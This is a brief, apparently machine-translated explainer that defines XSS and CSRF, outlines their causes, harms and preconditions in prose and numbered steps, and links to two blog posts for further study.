Cross site script : XSS for short : Refers to a malicious attacker who takes advantage of the website ’s lack of escaping or insufficient filtering of data submitted by users, and then adds some code to embed it in the web page. The access to other users will execute the corresponding embedded code. In this way, user information is stolen, and the user's identity is used to perform certain actions or a virus attack on visitors.
The hazards of XSS attacks : stealing various user accounts, controlling corporate data, stealing business materials, illegal transfers, forcibly sending e-mails, hanging websites, controlling victim machines to launch attacks on other websites
Main reason : Too much trust the data provided by the client!
Solution : Do not trust any data submitted by the client, as long as the data submitted by the client is filtered first before proceeding to the next operation.
Attack method : The data submitted by the client is required by the application, but a malicious attacker uses the website's trust in the data submitted by the client and inserts some symbols and javascript code in the data, then these data become part of the application code. very dangerous!
Cross site request forgery ( cross-site request forgery ) : Referred to as CSRF : It is an attack method that clamps users to perform unintended operations on already logged-in web applications.
Compared to XSS , CSRF utilizes the system's trust in the page browser; XSS utilizes the system's trust in users.
The principle of CSRF attack:
1 : The client logs in through the account password to access the password A ;
2 : Website A verifies the client's account password, if successful, it generates a sessionID and returns it to the client for storage in the browser;
3 : The client tabs a new page to visit website B
4 : Website B automatically triggers the request for the client to visit website A (that is, there is a link to website A on website B );
5 : the client through the Web site B links to access the site A (in this case, carries a legitimate sessionID access website A );
6 : At this time, the website A only needs to check whether the sessionID is legal, and execute the corresponding operation if it is legal!
CSRF attacks are conditional:
1 : The client must have visited this website and generated cookie credentials stored in the browser;
2 : The cookie is not cleared, and the client tabs a page to visit other websites.
XSS learning link : https://www.cnblogs.com/applelife/p/10477583.html
CSRF learning link : https://www.cnblogs.com/applelife/p/10477600.html